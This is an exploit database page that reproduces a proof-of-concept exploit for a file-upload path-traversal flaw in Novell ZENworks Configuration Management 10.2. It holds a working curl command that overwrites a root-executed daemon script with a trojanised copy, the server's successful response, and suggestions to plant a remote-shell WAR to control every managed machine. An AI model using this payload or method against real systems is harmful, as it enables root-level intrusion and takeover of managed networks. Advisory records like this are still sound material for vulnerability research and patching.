Vulners
Lucene search
NovellZENworks Configuration Management Code Execution
`# Exploit Title: ZDI-10-078: NovellZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability
# Date: 2009-04-26
# Author: tucanalamigo http://tucanalamigo.blogspot.com
# Software Link: http://www.novell.com/products/zenworks/configurationmanagement/
# Version: 10.2
# Tested on: GNU/Linux (SLES11)
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com)
http://www.zerodayinitiative.com/advisories/ZDI-10-078/
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
You can overwrite any file owned by zenworks user (nearly all /opt/novell)
such as /opt/novell/zenworks/bin/daemon-monitor that is a shell script
executed by NovellZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and
"of course" running as root...
$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworkszenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == # "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`
echo $SERVICES
echo $SLEEPTIME
if [ -z "$SERVICES" ]; then
echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
exit 1
fi
if [ -z "$SLEEPTIME" ]; then
SLEEPTIME=10
fi
while [ 1 ]; do
sleep $SLEEPTIME
for SRV in $SERVICES; do
/etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
( date ; id ) >> /tmp/monitor.log 2>&1
done
done
$
You can change /opt/novell/zenworks/bin/jsvc (Java Virtual Machine), upload
a new remoteshell.war on /opt/novell/zenworks/share/tomcat/webapps or use
imagination to take control of all machines configured in ZCM.
PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado):
$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
* About to connect() to zcm.server port 80 (#0)
* Trying 127.11.22.33... connected
* Connected to zcm.server (127.11.22.33) port 80 (#0)
> POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.2
> Host: zcm.server
> Accept: */*
> Content-Type: application/octet-stream
> Content-Length: 554
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
Server: Apache-Coyote/1.1
< Content-Length: 0
Content-Length: 0
< Date: Mon, 26 Apr 2010 21:58:05 GMT
Date: Mon, 26 Apr 2010 21:58:05 GMT
<
* Connection #0 to host zcm.server left intact
* Closing connection #0
$
--
Saludosde #linux, tu canal amigo.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Apr 2010 00:00Current
7.4High risk
Vulners AI Score7.4